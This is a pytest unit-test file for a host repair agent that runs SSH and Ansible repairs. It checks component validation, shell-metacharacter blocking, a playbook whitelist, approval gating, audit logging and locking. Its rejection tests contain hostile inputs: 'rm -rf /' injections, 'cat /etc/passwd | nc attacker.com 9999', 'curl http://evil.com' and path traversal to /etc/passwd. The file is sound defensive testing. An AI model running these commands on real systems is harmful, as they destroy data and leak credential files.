Files
awoooi/apps/api/tests/test_host_repair_agent.py
2026-04-06 14:38:59 +08:00

328 lines
14 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
tests/test_host_repair_agent.py
Host Repair Agent 單元測試
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
"""
import asyncio
import pytest
from unittest.mock import AsyncMock, patch
# =============================================================================
# 測試 HostRepairConfig 路由
# =============================================================================
class TestHostRepairConfig:
    """Routing of repair layers to the SSH endpoint (user, host) they use."""

    @staticmethod
    def _route(layer):
        """Resolve *layer* with get_ssh_config_for_layer and return (user, host)."""
        from src.services.host_repair_agent import get_ssh_config_for_layer

        cfg = get_ssh_config_for_layer(layer)
        return cfg["user"], cfg["host"]

    def test_layer_docker_110_routes_to_110(self):
        assert self._route("docker-110") == ("wooo", "192.168.0.110")

    def test_layer_docker_188_routes_to_188(self):
        assert self._route("docker-188") == ("ollama", "192.168.0.188")

    def test_layer_systemd_188_routes_to_188(self):
        assert self._route("systemd-188") == ("ollama", "192.168.0.188")

    def test_unknown_layer_raises(self):
        with pytest.raises(ValueError, match="Unknown layer"):
            self._route("unknown-layer")

    def test_k8s_layer_raises(self):
        """The k8s layer is not reached over SSH, so routing it must raise (message mentions kubectl)."""
        with pytest.raises(ValueError, match="kubectl"):
            self._route("k8s")
# =============================================================================
# 測試 SSH 命令組裝
# =============================================================================
class TestSSHCommandBuilding:
    """build_repair_command: the exact command string sent to the repair host."""

    VALID_COMPONENTS = (
        "sentry",
        "harbor",
        "gitea",
        "openclaw",
        "gitea-runner",
        "alertmanager",
        "redis",
        "nginx",
    )

    def test_repair_command_format(self):
        from src.services.host_repair_agent import build_repair_command

        assert build_repair_command("sentry") == "repair:sentry"

    def test_repair_command_component_sanitized(self):
        """A component name carrying shell syntax must be rejected (command-injection guard)."""
        from src.services.host_repair_agent import build_repair_command

        injected = "sentry; rm -rf /"
        with pytest.raises(ValueError, match="Invalid component"):
            build_repair_command(injected)

    def test_repair_command_valid_components(self):
        from src.services.host_repair_agent import build_repair_command

        for name in self.VALID_COMPONENTS:
            assert build_repair_command(name) == "repair:" + name
# =============================================================================
# 測試 HostRepairAgent.repair() 路由
# =============================================================================
class TestHostRepairAgent:
    """HostRepairAgent.repair(): routing and interpretation of the SSH reply.

    ``_ssh_execute`` is always replaced by an AsyncMock, so no real SSH happens.
    """

    @staticmethod
    async def _repair_with_ssh(layer, component, *, reply=None, error=None):
        """Run agent.repair() with a stubbed _ssh_execute.

        The stub returns *reply*, or raises *error* when one is given.
        Returns ``(result, ssh_mock)`` so callers can inspect the SSH call.
        """
        from src.services.host_repair_agent import HostRepairAgent

        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as ssh:
            if error is not None:
                ssh.side_effect = error
            else:
                ssh.return_value = reply
            outcome = await agent.repair(layer=layer, component=component)
        return outcome, ssh

    @pytest.mark.asyncio
    async def test_repair_success_returns_ok(self):
        result, ssh = await self._repair_with_ssh(
            "docker-110", "sentry", reply="REPAIR_OK:sentry"
        )
        assert result.success is True
        assert (result.component, result.layer) == ("sentry", "docker-110")
        ssh.assert_called_once_with(
            host="192.168.0.110",
            user="wooo",
            key_path="/etc/repair-ssh/id_ed25519",
            command="repair:sentry",
        )

    @pytest.mark.asyncio
    async def test_repair_fail_returns_failure(self):
        result, _ = await self._repair_with_ssh(
            "docker-110", "harbor", reply="REPAIR_FAIL:harbor:exit_1"
        )
        assert result.success is False
        assert "REPAIR_FAIL" in result.error

    @pytest.mark.asyncio
    async def test_repair_ssh_timeout_returns_failure(self):
        result, _ = await self._repair_with_ssh(
            "docker-110", "sentry", error=asyncio.TimeoutError()
        )
        assert result.success is False
        assert "timeout" in result.error.lower()

    @pytest.mark.asyncio
    async def test_repair_denied_returns_failure(self):
        result, _ = await self._repair_with_ssh(
            "docker-110",
            "badcomponent",
            reply="REPAIR_DENIED:unknown_component:badcomponent",
        )
        assert result.success is False
# =============================================================================
# 測試 URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
class TestParseUriCommand:
    """parse_uri_command: splitting ``scheme://host_or_layer/payload`` repair URIs."""

    @staticmethod
    def _parse(uri):
        from src.services.host_repair_agent import parse_uri_command

        return parse_uri_command(uri)

    @classmethod
    def _parts(cls, uri):
        """Return (scheme, host_or_layer, payload) for *uri*."""
        parsed = cls._parse(uri)
        return parsed.scheme, parsed.host_or_layer, parsed.payload

    def test_openclaw_scheme(self):
        expected = ("openclaw", "docker-110", "sentry")
        assert self._parts("openclaw://docker-110/sentry") == expected

    def test_ansible_scheme(self):
        expected = ("ansible", "192.168.0.188", "vacuum_postgres.yml")
        assert self._parts("ansible://192.168.0.188/vacuum_postgres.yml") == expected

    def test_ssh_scheme(self):
        # The user@ prefix stays in host_or_layer; the payload may contain spaces.
        expected = ("ssh", "wooo@192.168.0.110", "docker ps")
        assert self._parts("ssh://wooo@192.168.0.110/docker ps") == expected

    def test_invalid_scheme_raises(self):
        with pytest.raises(ValueError, match="Unsupported scheme"):
            self._parse("http://example.com/cmd")

    def test_missing_payload_raises(self):
        with pytest.raises(ValueError, match="payload"):
            self._parse("ansible://192.168.0.188/")

    def test_legacy_format_raises(self):
        # The old scheme-less "layer/component" form is no longer accepted.
        with pytest.raises(ValueError, match="Unsupported scheme"):
            self._parse("docker-110/sentry")
class TestValidateShellSafety:
    """validate_shell_safety: rejects shell metacharacters and over-long commands."""

    @staticmethod
    def _check(command):
        from src.services.host_repair_agent import validate_shell_safety

        validate_shell_safety(command)

    def _assert_metachar_rejected(self, command):
        with pytest.raises(ValueError, match="Shell metacharacter"):
            self._check(command)

    def test_safe_command_passes(self):
        self._check("docker ps")  # must not raise

    def test_semicolon_blocked(self):
        self._assert_metachar_rejected("docker ps; rm -rf /")

    def test_pipe_blocked(self):
        self._assert_metachar_rejected("cat /etc/passwd | nc attacker.com 9999")

    def test_double_ampersand_blocked(self):
        self._assert_metachar_rejected("ls && curl http://evil.com")

    def test_command_substitution_blocked(self):
        self._assert_metachar_rejected("echo $(id)")

    def test_backtick_blocked(self):
        self._assert_metachar_rejected("echo `id`")

    def test_too_long_blocked(self):
        oversized = "a" * 513
        with pytest.raises(ValueError, match="too long"):
            self._check(oversized)
import os
from unittest.mock import patch, AsyncMock
class TestAnsibleWhitelist:
    """validate_ansible_playbook: only names listed in ANSIBLE_PLAYBOOK_WHITELIST may run."""

    def test_allowed_playbook_passes(self):
        from src.services.host_repair_agent import validate_ansible_playbook
        with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}):
            validate_ansible_playbook("vacuum_postgres.yml")  # must not raise

    def test_disallowed_playbook_raises(self):
        from src.services.host_repair_agent import validate_ansible_playbook
        with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("evil_script.sh")

    def test_path_traversal_blocked(self):
        from src.services.host_repair_agent import validate_ansible_playbook
        with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
            with pytest.raises(ValueError, match="not in allowed whitelist"):
                validate_ansible_playbook("../../../etc/passwd")

    def test_path_to_whitelisted_name_blocked(self):
        """Paths whose basename IS whitelisted must still be rejected.

        The traversal target above ("passwd") is not whitelisted by name, so that
        test would also pass for a validator that compares only the basename.
        These inputs catch that case. Only ValueError is required here, because a
        dedicated traversal check may use its own message.
        """
        from src.services.host_repair_agent import validate_ansible_playbook
        with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
            for sneaky in ("../vacuum_postgres.yml", "/tmp/vacuum_postgres.yml"):
                with pytest.raises(ValueError):
                    validate_ansible_playbook(sneaky)
class TestRepairByUri:
    """HostRepairAgent.repair_by_uri(): dispatch by URI scheme.

    repair_by_uri writes an audit record through ``self._write_audit_log``, so
    every test stubs that method. This keeps the unit tests free of DB side
    effects.
    """

    @pytest.mark.asyncio
    async def test_openclaw_scheme_calls_repair(self):
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
        agent = HostRepairAgent()
        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock):
            mock_oc.return_value = HostRepairResult(
                success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
            )
            result = await agent.repair_by_uri("openclaw://docker-110/sentry")
        assert result.success is True
        mock_oc.assert_awaited_once_with("docker-110", "sentry")

    @pytest.mark.asyncio
    async def test_ansible_scheme_calls_ansible(self):
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
        agent = HostRepairAgent()
        with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as mock_ans, \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock), \
                patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
            mock_ans.return_value = HostRepairResult(
                success=True, layer="ansible", component="vacuum_postgres.yml", output="REPAIR_OK:ansible"
            )
            result = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")
        assert result.success is True
        mock_ans.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")

    @pytest.mark.asyncio
    async def test_ssh_scheme_blocked_without_approval_flag(self):
        from src.services.host_repair_agent import HostRepairAgent
        agent = HostRepairAgent()
        with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh, \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock):
            result = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps")
        assert result.success is False
        assert "requires_approval" in result.error
        # "Blocked" must mean nothing was sent over SSH, not merely a failure result.
        mock_ssh.assert_not_awaited()

    @pytest.mark.asyncio
    async def test_invalid_uri_returns_failure(self):
        from src.services.host_repair_agent import HostRepairAgent
        agent = HostRepairAgent()
        with patch.object(agent, "_write_audit_log", new_callable=AsyncMock):
            result = await agent.repair_by_uri("bad-format")
        assert result.success is False
        assert "Unsupported scheme" in result.error
class TestAuditLog:
    @pytest.mark.asyncio
    async def test_successful_repair_writes_audit_log(self):
        """A successful repair must write an audit record via _write_audit_log."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
        agent = HostRepairAgent()
        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as mock_audit:
            mock_oc.return_value = HostRepairResult(
                success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
            )
            result = await agent.repair_by_uri("openclaw://docker-110/sentry")
        assert result.success is True
        # Use assert_awaited rather than `.called`. A coroutine that is created
        # but never awaited still sets `.called`, yet writes nothing.
        mock_audit.assert_awaited()
class TestRepairLock:
    @pytest.mark.asyncio
    async def test_duplicate_repair_is_blocked(self):
        """A second concurrent repair of the same component must be rejected by the lock."""
        from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
        agent = HostRepairAgent()
        call_count = 0

        async def fake_execute_openclaw(layer, component):
            nonlocal call_count
            call_count += 1
            # Keep the first repair in flight so the second one hits the lock.
            await asyncio.sleep(0.1)
            return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test")

        with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock,
                          side_effect=fake_execute_openclaw), \
                patch.object(agent, "_write_audit_log", new_callable=AsyncMock):
            results = await asyncio.gather(
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                agent.repair_by_uri("openclaw://docker-110/sentry"),
                return_exceptions=True,
            )

        # Report unexpected exceptions directly. Otherwise they would be
        # silently dropped by the filters below.
        errors = [r for r in results if isinstance(r, BaseException)]
        assert not errors, f"repair_by_uri raised: {errors!r}"

        successes = [r for r in results if r.success]
        blocked = [r for r in results if not r.success and "already running" in (r.error or "")]
        assert len(successes) == 1
        assert len(blocked) == 1
        # The lock must stop the duplicate before it reaches the executor.
        assert call_count == 1